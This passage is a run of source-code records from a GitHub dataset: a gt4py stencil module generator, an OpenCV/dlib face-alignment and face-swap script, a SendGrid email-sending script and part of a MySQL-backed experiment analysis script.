np.arange(len(text))))\n","repo_name":"allenwind/text-signification-in-rnn","sub_path":"color.py","file_name":"color.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"4870140577","text":"import abc\nimport numbers\nimport os\nimport textwrap\nfrom dataclasses import dataclass, field\nfrom inspect import getdoc\nfrom typing import TYPE_CHECKING, Any, Dict, List, Optional, Set\n\nimport jinja2\nimport numpy\n\nfrom gt4py import ir as gt_ir\nfrom gt4py import utils as gt_utils\nfrom gt4py.definitions import AccessKind, Boundary, DomainInfo, FieldInfo, ParameterInfo\nfrom gtc import gtir, gtir_to_oir\nfrom gtc.passes.gtir_k_boundary import compute_k_boundary, compute_min_k_size\nfrom gtc.passes.gtir_pipeline import GtirPipeline\nfrom gtc.passes.oir_access_kinds import compute_access_kinds\nfrom gtc.passes.oir_optimizations.utils import compute_fields_extents\nfrom gtc.utils import dimension_flags_to_names\n\n\nif TYPE_CHECKING:\n from gt4py.stencil_builder import StencilBuilder\n\n\n@dataclass\nclass ModuleData:\n field_info: Dict[str, FieldInfo] = field(default_factory=dict)\n parameter_info: Dict[str, ParameterInfo] = field(default_factory=dict)\n unreferenced: List[str] = field(default_factory=list)\n\n @property\n def field_names(self) -> Set[str]:\n \"\"\"Set of all field names.\"\"\"\n return set(self.field_info.keys())\n\n @property\n def parameter_names(self) -> Set[str]:\n \"\"\"Set of all parameter names.\"\"\"\n return set(self.parameter_info.keys())\n\n\ndef make_args_data_from_gtir(pipeline: GtirPipeline) -> ModuleData:\n \"\"\"\n Compute module data containing information about stencil arguments from gtir.\n\n This is no longer compatible with the legacy backends.\n \"\"\"\n data = ModuleData()\n\n # NOTE: pipeline.gtir has not had prune_unused_parameters applied.\n all_params = pipeline.gtir.params\n\n node = pipeline.full()\n oir = gtir_to_oir.GTIRToOIR().visit(node)\n field_extents = compute_fields_extents(oir)\n accesses = compute_access_kinds(oir)\n\n for decl in (param for param in all_params if isinstance(param, gtir.FieldDecl)):\n access = accesses[decl.name]\n dtype = numpy.dtype(decl.dtype.name.lower())\n\n if access != AccessKind.NONE:\n k_boundary = compute_k_boundary(node)[decl.name]\n boundary = Boundary(*field_extents[decl.name].to_boundary()[0:2], k_boundary)\n else:\n boundary = Boundary.zeros(ndims=3)\n\n data.field_info[decl.name] = FieldInfo(\n access=access,\n boundary=boundary,\n axes=tuple(dimension_flags_to_names(decl.dimensions).upper()),\n data_dims=tuple(decl.data_dims),\n dtype=dtype,\n )\n\n for decl in (param for param in all_params if isinstance(param, gtir.ScalarDecl)):\n access = accesses[decl.name]\n dtype = numpy.dtype(decl.dtype.name.lower())\n data.parameter_info[decl.name] = ParameterInfo(access=access, dtype=dtype)\n\n data.unreferenced = [*sorted(name for name in accesses if accesses[name] == AccessKind.NONE)]\n return data\n\n\nclass BaseModuleGenerator(abc.ABC):\n\n SOURCE_LINE_LENGTH = 120\n TEMPLATE_INDENT_SIZE = 4\n DOMAIN_ARG_NAME = \"_domain_\"\n ORIGIN_ARG_NAME = \"_origin_\"\n SPLITTERS_NAME = \"_splitters_\"\n\n TEMPLATE_PATH = os.path.join(os.path.dirname(__file__), \"templates\", \"stencil_module.py.in\")\n\n _builder: Optional[\"StencilBuilder\"]\n args_data: ModuleData\n template: jinja2.Template\n\n def __init__(self, builder: Optional[\"StencilBuilder\"] = None):\n self._builder = builder\n self.args_data = ModuleData()\n with open(self.TEMPLATE_PATH, \"r\") as f:\n self.template = jinja2.Template(f.read())\n\n def __call__(\n self,\n args_data: ModuleData,\n builder: Optional[\"StencilBuilder\"] = None,\n **kwargs: Any,\n ) -> str:\n \"\"\"\n Generate source code for a Python module containing a StencilObject.\n\n A possible reaosn for extending is processing additional kwargs,\n using a different template might require completely overriding.\n \"\"\"\n if builder:\n self._builder = builder\n self.args_data = args_data\n\n module_source = self.template.render(\n imports=self.generate_imports(),\n module_members=self.generate_module_members(),\n class_name=self.generate_class_name(),\n class_members=self.generate_class_members(),\n docstring=self.generate_docstring(),\n gt_backend=self.generate_backend_name(),\n gt_source=self.generate_sources(),\n gt_domain_info=self.generate_domain_info(),\n gt_field_info=repr(self.args_data.field_info),\n gt_parameter_info=repr(self.args_data.parameter_info),\n gt_constants=self.generate_constants(),\n gt_options=self.generate_options(),\n stencil_signature=self.generate_signature(),\n field_names=self.args_data.field_names,\n param_names=self.args_data.parameter_names,\n pre_run=self.generate_pre_run(),\n post_run=self.generate_post_run(),\n implementation=self.generate_implementation(),\n )\n if self.builder.options.as_dict()[\"format_source\"]:\n module_source = gt_utils.text.format_source(\n module_source, line_length=self.SOURCE_LINE_LENGTH\n )\n\n return module_source\n\n @property\n def builder(self) -> \"StencilBuilder\":\n \"\"\"\n Expose the builder reference.\n\n Raises a runtime error if the builder reference is not initialized.\n This is necessary because other parts of the public API depend on it before it is\n guaranteed to be initialized.\n \"\"\"\n if not self._builder:\n raise RuntimeError(\"Builder attribute not initialized!\")\n return self._builder\n\n @property\n def backend_name(self) -> str:\n return self.builder.backend.name\n\n @abc.abstractmethod\n def generate_implementation(self) -> str:\n \"\"\"Generate the work code inside the stencil object's run function.\"\"\"\n pass\n\n def generate_imports(self) -> str:\n \"\"\"Generate import statements and related code for the stencil class module.\"\"\"\n return \"\"\n\n def generate_class_name(self) -> str:\n \"\"\"\n Generate the name of the stencil class.\n\n This should ususally be deferred to the chosen caching strategy via\n the builder object (see default implementation).\n \"\"\"\n return self.builder.class_name\n\n def generate_docstring(self) -> str:\n \"\"\"\n Generate the docstring of the stencil object.\n\n The default is to return the stencil definition's docstring or an\n empty string.\n The output should be least based on the stencil definition's docstring,\n if one exists.\n \"\"\"\n return getdoc(self.builder.definition) or \"\"\n\n def generate_backend_name(self) -> str:\n \"\"\"\n Return the name of the backend.\n\n There should never be a need to override this.\n \"\"\"\n return self.backend_name\n\n def generate_sources(self) -> Dict[str, str]:\n \"\"\"\n Return the source code of the stencil definition in string format.\n\n This is unlikely to require overriding.\n \"\"\"\n if self.builder.definition_ir.sources is not None:\n return {\n key: gt_utils.text.format_source(value, line_length=self.SOURCE_LINE_LENGTH)\n for key, value in self.builder.definition_ir.sources\n }\n return {}\n\n def generate_constants(self) -> Dict[str, str]:\n \"\"\"\n Return a mapping of named numeric constants passed as externals.\n\n This is unlikely to require overriding.\n \"\"\"\n if self.builder.definition_ir.externals:\n return {\n name: repr(value)\n for name, value in self.builder.definition_ir.externals.items()\n if isinstance(value, numbers.Number)\n }\n return {}\n\n def generate_options(self) -> Dict[str, Any]:\n \"\"\"\n Return dictionary of build options.\n\n Must exclude options that should never be cached.\n \"\"\"\n return {\n key: value\n for key, value in self.builder.options.as_dict().items()\n if key not in [\"build_info\"]\n }\n\n def generate_domain_info(self) -> str:\n \"\"\"\n Generate a ``DomainInfo`` constructor call with the correct arguments.\n\n Might require overriding for module generators of non-cartesian backends.\n \"\"\"\n parallel_axes = self.builder.definition_ir.domain.parallel_axes or []\n sequential_axis = self.builder.definition_ir.domain.sequential_axis.name\n if self.builder.backend.USE_LEGACY_TOOLCHAIN:\n min_sequential_axis_size = 0\n else:\n min_sequential_axis_size = compute_min_k_size(self.builder.gtir_pipeline.full())\n domain_info = repr(\n DomainInfo(\n parallel_axes=tuple(ax.name for ax in parallel_axes),\n sequential_axis=sequential_axis,\n min_sequential_axis_size=min_sequential_axis_size,\n ndim=len(parallel_axes) + (1 if sequential_axis else 0),\n )\n )\n return domain_info\n\n def generate_module_members(self) -> str:\n \"\"\"\n Generate additional module level code after all imports.\n\n May contain any executable module level code including function and class defs.\n \"\"\"\n return \"\"\n\n def generate_class_members(self) -> str:\n \"\"\"\n Generate additional stencil class members.\n\n May contain any class level code including methods.\n \"\"\"\n return \"\"\n\n def generate_signature(self) -> str:\n \"\"\"\n Generate the stencil definition specific part of the stencil object's ``__call__`` signature.\n\n Unlikely to require overriding.\n \"\"\"\n args = []\n keyword_args = [\"*\"]\n for arg in self.builder.definition_ir.api_signature:\n if arg.is_keyword:\n if arg.default is not gt_ir.Empty:\n keyword_args.append(\n \"{name}={default}\".format(name=arg.name, default=arg.default)\n )\n else:\n keyword_args.append(arg.name)\n else:\n if arg.default is not gt_ir.Empty:\n args.append(\"{name}={default}\".format(name=arg.name, default=arg.default))\n else:\n args.append(arg.name)\n\n if len(keyword_args) > 1:\n args.extend(keyword_args)\n signature = \", \".join(args)\n\n return signature\n\n def generate_pre_run(self) -> str:\n \"\"\"Additional code to be run just before the run method (implementation) is called.\"\"\"\n return \"\"\n\n def generate_post_run(self) -> str:\n \"\"\"Additional code to be run just after the run method (implementation) is called.\"\"\"\n return \"\"\n\n\ndef iir_is_not_emtpy(implementation_ir: gt_ir.StencilImplementation) -> bool:\n return bool(implementation_ir.multi_stages)\n\n\ndef gtir_is_not_emtpy(pipeline: GtirPipeline) -> bool:\n node = pipeline.full()\n return bool(node.iter_tree().if_isinstance(gtir.ParAssignStmt).to_list())\n\n\ndef iir_has_effect(implementation_ir: gt_ir.StencilImplementation) -> bool:\n return bool(implementation_ir.has_effect)\n\n\ndef gtir_has_effect(pipeline: GtirPipeline) -> bool:\n return True\n\n\nclass PyExtModuleGenerator(BaseModuleGenerator):\n \"\"\"\n Module Generator for use with backends that generate c++ python extensions.\n\n Will either use ImplementationIR or GTIR depending on the backend's USE_LEGACY_TOOLCHAIN\n class attribute. Using with other IRs requires subclassing and overriding ``_is_not_empty()``\n and ``_has_effect()`` methods.\n \"\"\"\n\n pyext_module_name: Optional[str]\n pyext_file_path: Optional[str]\n\n def __init__(self):\n super().__init__()\n self.pyext_module_name = None\n self.pyext_file_path = None\n\n def __call__(\n self,\n args_data: ModuleData,\n builder: Optional[\"StencilBuilder\"] = None,\n **kwargs: Any,\n ) -> str:\n self.pyext_module_name = kwargs[\"pyext_module_name\"]\n self.pyext_file_path = kwargs[\"pyext_file_path\"]\n return super().__call__(args_data, builder, **kwargs)\n\n def _is_not_empty(self) -> bool:\n if self.pyext_module_name is None:\n return False\n if self.builder.backend.USE_LEGACY_TOOLCHAIN:\n return iir_is_not_emtpy(self.builder.implementation_ir)\n return gtir_is_not_emtpy(self.builder.gtir_pipeline)\n\n def generate_imports(self) -> str:\n source = [\"from gt4py import utils as gt_utils\"]\n if self._is_not_empty():\n assert self.pyext_file_path is not None\n file_path = 'f\"{{pathlib.Path(__file__).parent.resolve()}}/{}\"'.format(\n os.path.basename(self.pyext_file_path)\n )\n source.append(\n textwrap.dedent(\n f\"\"\"\n pyext_module = gt_utils.make_module_from_file(\n \"{self.pyext_module_name}\", {file_path}, public_import=True\n )\n \"\"\"\n )\n )\n return \"\\n\".join(source)\n\n def _has_effect(self) -> bool:\n if not self._is_not_empty():\n return False\n if self.builder.backend.USE_LEGACY_TOOLCHAIN:\n return iir_has_effect(self.builder.implementation_ir)\n return gtir_has_effect(self.builder.gtir_pipeline)\n\n def generate_implementation(self) -> str:\n definition_ir = self.builder.definition_ir\n sources = gt_utils.text.TextBlock(indent_size=BaseModuleGenerator.TEMPLATE_INDENT_SIZE)\n\n args = []\n api_fields = set(field.name for field in definition_ir.api_fields)\n for arg in definition_ir.api_signature:\n if arg.name not in self.args_data.unreferenced:\n args.append(arg.name)\n if arg.name in api_fields:\n args.append(\"list(_origin_['{}'])\".format(arg.name))\n\n # only generate implementation if any multi_stages are present. e.g. if no statement in the\n # stencil has any effect on the API fields, this may not be the case since they could be\n # pruned.\n if self._has_effect():\n source = textwrap.dedent(\n f\"\"\"\n # Load or generate a GTComputation object for the current domain size\n pyext_module.run_computation({\",\".join([\"list(_domain_)\", *args, \"exec_info\"])})\n \"\"\"\n )\n sources.extend(source.splitlines())\n else:\n sources.extend(\"\\n\")\n\n return sources.text\n\n\nclass CUDAPyExtModuleGenerator(PyExtModuleGenerator):\n def generate_implementation(self) -> str:\n source = super().generate_implementation()\n if self.builder.options.backend_opts.get(\"device_sync\", True):\n source += textwrap.dedent(\n \"\"\"\n cupy.cuda.Device(0).synchronize()\n \"\"\"\n )\n return source\n\n def generate_imports(self) -> str:\n source = (\n textwrap.dedent(\n \"\"\"\n import cupy\n \"\"\"\n )\n + super().generate_imports()\n )\n return source\n","repo_name":"tehrengruber/gt4py","sub_path":"src/gt4py/backend/module_generator.py","file_name":"module_generator.py","file_ext":"py","file_size_in_byte":15389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"4098078202","text":"import pickle\r\nimport cv2\r\nimport mtcnn\r\nimport os\r\nimport numpy as np\r\nimport dlib\r\nfrom sklearn.metrics import mean_squared_error\r\nfrom scipy.spatial.distance import euclidean\r\n\r\n\r\ndef detectFaceLandmarks():\r\n face_detector = mtcnn.MTCNN()\r\n cap = cv2.VideoCapture(0)\r\n\r\n while True:\r\n x, img = cap.read()\r\n results = face_detector.detect_faces(img)\r\n\r\n for res in results:\r\n x1, y1, width, height = res['box']\r\n x2, y2 = x1 + width, y1 + height\r\n\r\n key_points = res['keypoints'].values()\r\n\r\n for point in key_points:\r\n cv2.circle(img, point, 5, (0, 255, 0), thickness=-1)\r\n\r\n cv2.imshow('Image', img)\r\n\r\n k = cv2.waitKey(30) & 0xff\r\n if k == 27:\r\n break\r\n\r\n\r\ndef anotationsToSomethingNormal():\r\n annotations = {}\r\n with open(\"list_landmarks_celeba.txt\", \"r\") as file:\r\n for line in file:\r\n line = line.split()\r\n key = line[0]\r\n line.pop(0)\r\n outputLine = [[line[0], line[1]], [line[2], line[3]], [line[4], line[5]], [line[6], line[7]],\r\n [line[8], line[9]]]\r\n annotations.update({key: outputLine})\r\n\r\n with open('annotations.txt', 'wb') as fp:\r\n pickle.dump(annotations, fp)\r\n\r\n return annotations\r\n\r\n\r\ndef getDataFromPhotos():\r\n i = 0\r\n face_detector = mtcnn.MTCNN()\r\n dataFound = {}\r\n\r\n for filename in os.listdir('data'):\r\n img = cv2.imread('data/' + filename)\r\n results = face_detector.detect_faces(img)\r\n\r\n for res in results:\r\n key_points = res['keypoints']\r\n left_eye = list(key_points.get('left_eye'))\r\n right_eye = list(key_points.get('right_eye'))\r\n nose = list(key_points.get('nose'))\r\n mouth_left = list(key_points.get('mouth_left'))\r\n mouth_right = list(key_points.get('mouth_right'))\r\n\r\n outputList = [left_eye, right_eye, nose, mouth_left, mouth_right]\r\n\r\n print(i)\r\n print(filename)\r\n print(outputList)\r\n i += 1\r\n dataFound.update({filename: outputList})\r\n\r\n with open('foundCoordinates.txt', 'wb') as fo:\r\n pickle.dump(dataFound, fo)\r\n\r\n return dataFound\r\n\r\n\r\ndef calculateMSE(annotations, foundCoordinates):\r\n for x in annotations:\r\n annotations[x] = list(np.float_(annotations[x]))\r\n for i in foundCoordinates:\r\n foundCoordinates[i] = list(np.float_(foundCoordinates[i]))\r\n\r\n outputDictionary = {}\r\n totalMSE = 0.0\r\n for key in foundCoordinates:\r\n outputDictionary.update({key: [[foundCoordinates.get(key)], [annotations.get(key)],\r\n mean_squared_error(annotations.get(key), foundCoordinates.get(key))]})\r\n totalMSE = mean_squared_error(annotations.get(key), foundCoordinates.get(key)) + totalMSE\r\n\r\n totalMSE = totalMSE / len(foundCoordinates)\r\n print('Total MSE: ', totalMSE)\r\n return outputDictionary\r\n\r\n\r\ndef loadEverything():\r\n with open('annotations.txt', 'rb') as fp:\r\n annotations = pickle.load(fp)\r\n\r\n with open('foundCoordinates.txt', 'rb') as fo:\r\n foundCoordinates = pickle.load(fo)\r\n\r\n return annotations, foundCoordinates\r\n\r\n\r\n# https://www.youtube.com/watch?v=81lCsiNBvrM&t=429s&ab_channel=PracticalAI\r\n# https://github.com/Practical-AI/Face/blob/master/_04_face_alignment/01_face_alignment.py\r\ndef align(img, left_eye_pos, right_eye_pos, size=(150, 150), eye_pos=(0.35, 0.35)):\r\n width, height = size\r\n eye_pos_w, eye_pos_h = eye_pos\r\n\r\n l_e, r_e = left_eye_pos, right_eye_pos\r\n\r\n dy = r_e[1] - l_e[1]\r\n dx = r_e[0] - l_e[0]\r\n dist = euclidean(l_e, r_e)\r\n scale = (width * (1 - 2 * eye_pos_w)) / dist\r\n\r\n center = ((l_e[0] + r_e[0]) // 2, (l_e[1] + r_e[1]) // 2)\r\n angle = np.degrees(np.arctan2(dy, dx)) + 360\r\n\r\n m = cv2.getRotationMatrix2D(center, angle, scale)\r\n tx = width * 0.5\r\n ty = height * eye_pos_h\r\n m[0, 2] += (tx - center[0])\r\n m[1, 2] += (ty - center[1])\r\n\r\n aligned_face = cv2.warpAffine(img, m, (width, height))\r\n return aligned_face\r\n\r\n\r\ndef alignFaces(foundCoordinates):\r\n for key in foundCoordinates:\r\n img = cv2.imread('data/' + key)\r\n value = foundCoordinates.get(key)\r\n left_eye = tuple([value[0][0], value[0][1]])\r\n right_eye = tuple([value[1][0], value[1][1]])\r\n aligned = align(img, left_eye, right_eye)\r\n cv2.imwrite('faces/' + key, aligned)\r\n cv2.imshow('foto', aligned)\r\n cv2.waitKey(0)\r\n\r\n\r\n# https://automaticaddison.com/how-to-blend-multiple-images-using-opencv/\r\ndef getAverageImage():\r\n image_data = []\r\n for filename in os.listdir('data'):\r\n img = cv2.imread('faces/' + filename)\r\n if img is not None:\r\n image_data.append(img)\r\n\r\n dst = image_data[0]\r\n\r\n for i in range(len(image_data)):\r\n if i == 0:\r\n pass\r\n else:\r\n alpha = 1.0 / (i + 1)\r\n beta = 1.0 - alpha\r\n dst = cv2.addWeighted(image_data[i], alpha, dst, beta, 0.0)\r\n\r\n cv2.imshow('Average face', dst)\r\n cv2.waitKey(0)\r\n return dst\r\n\r\n\r\ndef getMostSimilarImage(averageImage):\r\n err = 9999999\r\n for filename in os.listdir('faces'):\r\n img = cv2.imread('faces/' + filename)\r\n\r\n errNow = np.sum((averageImage.astype(\"float\") - img.astype(\"float\")) ** 2)\r\n errNow /= float(averageImage.shape[0] * averageImage.shape[1])\r\n\r\n print(errNow)\r\n\r\n if errNow < err:\r\n err = errNow\r\n mostSilimarImage = cv2.imread('faces/' + filename)\r\n\r\n cv2.imshow('Most Silimar Image', mostSilimarImage)\r\n cv2.waitKey(0)\r\n return mostSilimarImage\r\n\r\n\r\n# https://pysource.com/2019/05/28/face-swapping-explained-in-8-steps-opencv-with-python/\r\ndef faceSwap(inputwebcam, secondface):\r\n def extract_index_nparray(nparray):\r\n index = None\r\n for num in nparray[0]:\r\n index = num\r\n break\r\n return index\r\n\r\n img = inputwebcam\r\n img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n mask = np.zeros_like(img_gray)\r\n img2 = secondface\r\n img2_gray = cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)\r\n\r\n detector = dlib.get_frontal_face_detector()\r\n predictor = dlib.shape_predictor(\"shape_predictor_68_face_landmarks.dat\")\r\n height, width, channels = img2.shape\r\n img2_new_face = np.zeros((height, width, channels), np.uint8)\r\n\r\n # Face 1\r\n faces = detector(img_gray)\r\n for face in faces:\r\n landmarks = predictor(img_gray, face)\r\n landmarks_points = []\r\n for n in range(0, 68):\r\n x = landmarks.part(n).x\r\n y = landmarks.part(n).y\r\n landmarks_points.append((x, y))\r\n\r\n points = np.array(landmarks_points, np.int32)\r\n convexhull = cv2.convexHull(points)\r\n # cv2.polylines(img, [convexhull], True, (255, 0, 0), 3)\r\n cv2.fillConvexPoly(mask, convexhull, 255)\r\n\r\n face_image_1 = cv2.bitwise_and(img, img, mask=mask)\r\n\r\n # Delaunay triangulation\r\n rect = cv2.boundingRect(convexhull)\r\n subdiv = cv2.Subdiv2D(rect)\r\n subdiv.insert(landmarks_points)\r\n triangles = subdiv.getTriangleList()\r\n triangles = np.array(triangles, dtype=np.int32)\r\n\r\n indexes_triangles = []\r\n for t in triangles:\r\n pt1 = (t[0], t[1])\r\n pt2 = (t[2], t[3])\r\n pt3 = (t[4], t[5])\r\n\r\n index_pt1 = np.where((points == pt1).all(axis=1))\r\n index_pt1 = extract_index_nparray(index_pt1)\r\n\r\n index_pt2 = np.where((points == pt2).all(axis=1))\r\n index_pt2 = extract_index_nparray(index_pt2)\r\n\r\n index_pt3 = np.where((points == pt3).all(axis=1))\r\n index_pt3 = extract_index_nparray(index_pt3)\r\n\r\n if index_pt1 is not None and index_pt2 is not None and index_pt3 is not None:\r\n triangle = [index_pt1, index_pt2, index_pt3]\r\n indexes_triangles.append(triangle)\r\n\r\n # Face 2\r\n faces2 = detector(img2_gray)\r\n for face in faces2:\r\n landmarks = predictor(img2_gray, face)\r\n landmarks_points2 = []\r\n for n in range(0, 68):\r\n x = landmarks.part(n).x\r\n y = landmarks.part(n).y\r\n landmarks_points2.append((x, y))\r\n\r\n points2 = np.array(landmarks_points2, np.int32)\r\n convexhull2 = cv2.convexHull(points2)\r\n\r\n lines_space_mask = np.zeros_like(img_gray)\r\n lines_space_new_face = np.zeros_like(img2)\r\n # Triangulation of both faces\r\n for triangle_index in indexes_triangles:\r\n # Triangulation of the first face\r\n tr1_pt1 = landmarks_points[triangle_index[0]]\r\n tr1_pt2 = landmarks_points[triangle_index[1]]\r\n tr1_pt3 = landmarks_points[triangle_index[2]]\r\n triangle1 = np.array([tr1_pt1, tr1_pt2, tr1_pt3], np.int32)\r\n\r\n rect1 = cv2.boundingRect(triangle1)\r\n (x, y, w, h) = rect1\r\n cropped_triangle = img[y: y + h, x: x + w]\r\n cropped_tr1_mask = np.zeros((h, w), np.uint8)\r\n\r\n points = np.array([[tr1_pt1[0] - x, tr1_pt1[1] - y],\r\n [tr1_pt2[0] - x, tr1_pt2[1] - y],\r\n [tr1_pt3[0] - x, tr1_pt3[1] - y]], np.int32)\r\n\r\n cv2.fillConvexPoly(cropped_tr1_mask, points, 255)\r\n\r\n # Lines space\r\n cv2.line(lines_space_mask, tr1_pt1, tr1_pt2, 255)\r\n cv2.line(lines_space_mask, tr1_pt2, tr1_pt3, 255)\r\n cv2.line(lines_space_mask, tr1_pt1, tr1_pt3, 255)\r\n lines_space = cv2.bitwise_and(img, img, mask=lines_space_mask)\r\n\r\n # Triangulation of second face\r\n tr2_pt1 = landmarks_points2[triangle_index[0]]\r\n tr2_pt2 = landmarks_points2[triangle_index[1]]\r\n tr2_pt3 = landmarks_points2[triangle_index[2]]\r\n triangle2 = np.array([tr2_pt1, tr2_pt2, tr2_pt3], np.int32)\r\n\r\n rect2 = cv2.boundingRect(triangle2)\r\n (x, y, w, h) = rect2\r\n\r\n cropped_tr2_mask = np.zeros((h, w), np.uint8)\r\n\r\n points2 = np.array([[tr2_pt1[0] - x, tr2_pt1[1] - y],\r\n [tr2_pt2[0] - x, tr2_pt2[1] - y],\r\n [tr2_pt3[0] - x, tr2_pt3[1] - y]], np.int32)\r\n\r\n cv2.fillConvexPoly(cropped_tr2_mask, points2, 255)\r\n\r\n # Warp triangles\r\n points = np.float32(points)\r\n points2 = np.float32(points2)\r\n M = cv2.getAffineTransform(points, points2)\r\n warped_triangle = cv2.warpAffine(cropped_triangle, M, (w, h))\r\n warped_triangle = cv2.bitwise_and(warped_triangle, warped_triangle, mask=cropped_tr2_mask)\r\n\r\n # Reconstructing destination face\r\n img2_new_face_rect_area = img2_new_face[y: y + h, x: x + w]\r\n img2_new_face_rect_area_gray = cv2.cvtColor(img2_new_face_rect_area, cv2.COLOR_BGR2GRAY)\r\n _, mask_triangles_designed = cv2.threshold(img2_new_face_rect_area_gray, 1, 255, cv2.THRESH_BINARY_INV)\r\n warped_triangle = cv2.bitwise_and(warped_triangle, warped_triangle, mask=mask_triangles_designed)\r\n\r\n img2_new_face_rect_area = cv2.add(img2_new_face_rect_area, warped_triangle)\r\n img2_new_face[y: y + h, x: x + w] = img2_new_face_rect_area\r\n\r\n # Face swapped (putting 1st face into 2nd face)\r\n img2_face_mask = np.zeros_like(img2_gray)\r\n img2_head_mask = cv2.fillConvexPoly(img2_face_mask, convexhull2, 255)\r\n img2_face_mask = cv2.bitwise_not(img2_head_mask)\r\n\r\n img2_head_noface = cv2.bitwise_and(img2, img2, mask=img2_face_mask)\r\n result = cv2.add(img2_head_noface, img2_new_face)\r\n\r\n (x, y, w, h) = cv2.boundingRect(convexhull2)\r\n center_face2 = (int((x + x + w) / 2), int((y + y + h) / 2))\r\n\r\n seamlessclone = cv2.seamlessClone(result, img2, img2_head_mask, center_face2, cv2.NORMAL_CLONE)\r\n\r\n return seamlessclone\r\n # cv2.imshow(\"seamlessclone\", seamlessclone)\r\n # cv2.waitKey(0)\r\n #\r\n # cv2.destroyAllWindows()\r\n\r\n\r\ndef webcamFaceswap():\r\n cap = cv2.VideoCapture(0)\r\n while True:\r\n xyz, image = cap.read()\r\n secondImage = cv2.imread('data/003147.jpg')\r\n outputImage = faceSwap(image, secondImage)\r\n cv2.imshow('Outputimage', outputImage)\r\n cv2.waitKey(0)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n detectFaceLandmarks()\r\n # annotations = anotationsToSomethingNormal()\r\n # foundCoordinates = getDataFromPhotos()\r\n\r\n annotations, foundCoordinates = loadEverything()\r\n\r\n dictionaryMSE = calculateMSE(annotations, foundCoordinates)\r\n\r\n #alignFaces(foundCoordinates)\r\n\r\n averageImage = getAverageImage()\r\n\r\n mostSimilarImage = getMostSimilarImage(averageImage)\r\n\r\n webcamFaceswap()\r\n\r\n","repo_name":"xdurfina/image-face-recognition-and-align","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73841916212","text":"## https://docs.sendgrid.com/for-developers/sending-email/quickstart-python#complete-code-block\n# https://stackoverflow.com/questions/39717986/httperror-http-error-401-unauthorized-for-sendgrid-integration-with-python\n\n# importing library\nimport sendgrid\nimport os\nfrom sendgrid.helpers.mail import Mail, Email, To, Content\n\n# make sure to set environment variable before you do this\n\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n# Functions\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n\n# Function to send email\ndef sendEmailFunc(sendFROMemail,sendTOemail,subjectLine,contentOfMessage):\n sg = sendgrid.SendGridAPIClient(api_key=os.environ.get('SENDGRID_API_KEY'))\n #sg = sendgrid.SendGridAPIClient(api_key)\n from_email = Email(f\"{sendFROMemail}\") # Change to your verified sender\n to_email = To(f\"{sendTOemail}\") # Change to your recipient\n subject = f\"{subjectLine}\"\n content = Content(\"text/plain\", f\"{contentOfMessage}\")\n mail = Mail(from_email, to_email, subject, content)\n\n # Get a JSON-ready representation of the Mail object\n mail_json = mail.get()\n\n # Send an HTTP POST request to /mail/send\n response = sg.client.mail.send.post(request_body=mail_json)\n print(response.status_code)\n print(response.headers)\n\n\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n# Main\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n\n# This is where the information is gathered from the user to craft email\n# mp3converterandencryptor@gmail.com \nsourceEmail = input(\"What email are your sending this from: \")\noutboundEmail = input(\"Who are we sending this to: \")\n\nsubjectOfEmail = input(\"What is the Subject line: \")\ncontentOfEmail = input(\"What content do you want in this email: \")\n\n\nsendEmailFunc(sourceEmail,outboundEmail,subjectOfEmail,contentOfEmail)\n\nprint(\"DONEZO!\")","repo_name":"jacobpclouse/Mp3-Generator","sub_path":"backend/sample Scripts/Send Email with attachments/sendgridEmail_V3.py","file_name":"sendgridEmail_V3.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"8566633493","text":"import numpy as np\nimport pylab as pl\nimport pymysql\nimport sys, traceback\nfrom scipy.optimize import curve_fit\nfrom exp_units_conversions import red_far_by_curr, white_far_by_curr, dry_intQ, final_intQ\n\ndef sweet_print(str_):\n print(\"\\n{:<30} {}\".format(\"[ NOTE ]\", str_))\n\ndef calculate_final_effect(_db_params, _search_table, _exp_id, dM_exp, dM_control,\n R_control, W_control, h_led_control, h_led_exp):\n # get one point remotely and calculate F\n con = pymysql.connect(host=_db_params[\"host\"],\n user=_db_params[\"user\"],\n password=_db_params[\"password\"],\n db=_db_params['db'],\n charset='utf8mb4',\n cursorclass=pymysql.cursors.DictCursor)\n\n cur = con.cursor()\n\n\n\n # get days of experiment\n comm_str = \"select distinct(date(end_time)) as day from exp_data where \" \\\n \"is_finished=0 and exp_id={};\".format(_exp_id)\n cur.execute(comm_str)\n rows = cur.fetchall()\n # return (_db_params, _search_table, _exp_id)\n days = [x['day'] for x in rows]\n print(\"days of experiment: \")\n for d in days:\n print(str(d))\n E_mean_days = []\n\n # ok_symb = \"[ NOTE ]\"\n\n for d in days:\n print(\"\\n ==================================================================\")\n print(\"try to calculate day {}\".format(d))\n print(\" ==================================================================\")\n # search min_G point and find correspond R_min and W_min\n\n # in db we store at least two rows with same step_id\n # lets load them for every point in _todays_search_table and find mean Q value\n # also we will bubble search point with maximum of mean Q-value\n min_g_point = None\n max_f_point = None\n error_points = list()\n num_of_table_points = 0\n for point in _search_table:\n try:\n comm_str = \"select * from exp_data where date(end_time) = date('{}')\" \\\n \" and exp_id={} and step_id={} and is_finished=0;\".format(\n d, _exp_id, point['number'])\n # print(comm_str)\n cur.execute(comm_str)\n rows = cur.fetchall()\n\n # lets get mean sum of q_val for that two rows\n q1 = rows[0]['q_val']\n q2 = rows[1]['q_val']\n\n mean_q = (q1 + q2) / 2\n\n f1 = rows[0]['f_val']\n f2 = rows[1]['f_val']\n\n mean_f = (f1 + f2) / 2\n\n # add that value to point as new key-value pair\n point.update({'mean_q': mean_q})\n point.update({'mean_f': 